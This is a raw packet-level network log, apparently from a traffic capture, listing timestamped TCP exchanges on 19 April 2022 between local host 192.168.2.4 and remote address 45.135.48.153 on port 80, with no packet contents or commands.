Apr 19, 2022 16:44:42.336287975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.336319923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.336435080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.336488962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.336559057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.336675882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.336730003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.336759090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.336919069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.336982965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.336982965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.337122917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.337188959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.337239027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.337357998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.337410927 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.337440968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.337618113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.337677002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.337678909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.337800026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.337884903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.337924004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.338037014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.338095903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.338124037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.338287115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.338346958 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.422362089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.422425032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.422465086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.422509909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.422550917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.422621012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.422674894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.422729969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.422795057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.422833920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.422940016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.423032999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.423086882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.423151970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.423206091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.423296928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.423392057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.423490047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.423548937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.423640966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.423693895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.423757076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.423896074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.423999071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.424060106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.424091101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.424140930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.424207926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.424343109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.424484968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.424544096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.424602032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.424643040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.424654007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.424711943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.424879074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.424932957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.424973965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.425029039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.425044060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.425177097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.425684929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.425720930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.425890923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.426209927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.426266909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.426361084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.426415920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.426661968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.426858902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.426975965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.427032948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.427098989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.427160978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.427187920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.427328110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.427412987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.427474022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.427536011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.427612066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.427666903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.427778006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.427896976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.427953959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.427953959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.428005934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.428155899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.428214073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.428319931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.428383112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.428442001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.428494930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.428513050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.428657055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.428751945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.428807974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.428899050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.428951979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.429016113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.429137945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.429224968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.429285049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.429333925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.429383039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.429445028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.429590940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.429697037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.429750919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.429816961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.429869890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.429899931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.430035114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.430207014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.430247068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.430269003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.430291891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.430380106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.430490017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.430614948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.430674076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.430778027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.430836916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.430938005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.431081057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.431252956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.431307077 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.431395054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.431451082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.431514978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.431613922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.431668043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.431726933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.431730986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.431771994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.431781054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.431842089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.431936979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.431994915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.432131052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.432187080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.432249069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.432429075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.432589054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.432648897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.432701111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.432753086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.432873011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433059931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433100939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433156013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.433247089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433305025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.433365107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433404922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433445930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433489084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433501005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.433551073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.433583021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433666945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433780909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433839083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.433877945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.433931112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.433964968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.434139013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.439519882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.448936939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.448971987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.448999882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.449033022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.449111938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.449170113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.449213982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.449270964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.449328899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.449387074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.449527025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.449659109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.449716091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.449748993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.449798107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.449877977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.449979067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.450067997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.450122118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.450241089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.450289965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.450292110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.450417042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.450541019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.450603962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.450648069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.450699091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.450769901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.450887918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.451015949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.451076031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.451119900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.451169968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.451229095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.451287985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.451421022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.451473951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.451560020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.451611996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.451668978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.451747894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.451939106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.451972008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.451991081 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.452013016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.452135086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.452254057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.452361107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.452415943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.452464104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.452516079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.452574968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.452685118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.452805042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.452856064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.452935934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.452987909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.453021049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.453142881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.453248024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.453299046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.453428030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.453461885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.453483105 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.453583956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.453694105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.453748941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.453809023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.453860044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.453941107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.454030037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.454142094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.454195023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.454251051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.454302073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.454360962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.454480886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.454612017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.454667091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.454725981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.454780102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.454824924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.454953909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.455060959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.455115080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.455169916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.455215931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.455293894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.455385923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.455514908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.455568075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.455651999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.455702066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.455873966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.456106901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.456351042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.456403017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.456585884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.456634998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.456824064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.457104921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.457287073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.457350969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.457547903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.457640886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.457709074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.457825899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.457882881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.457902908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.458014965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.458062887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.458121061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.458255053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.458312035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.458343029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.458463907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.458602905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.458661079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.458709955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.458761930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.458764076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.458894014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.459007025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.459067106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.459088087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.459137917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.459208965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.459333897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.459445000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.459525108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.459578991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.459635019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.459685087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.459791899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.459898949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.459956884 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.460011005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.460062981 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.460134029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.460263968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.460336924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.460398912 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.460490942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.460551977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.460596085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.460664034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.460823059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.460882902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.460899115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.460947990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.461035013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.461138010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.461342096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.461369991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.461400986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.461436987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.461474895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.461599112 CEST	80	49758	45.135.48.153	192.168.2.4
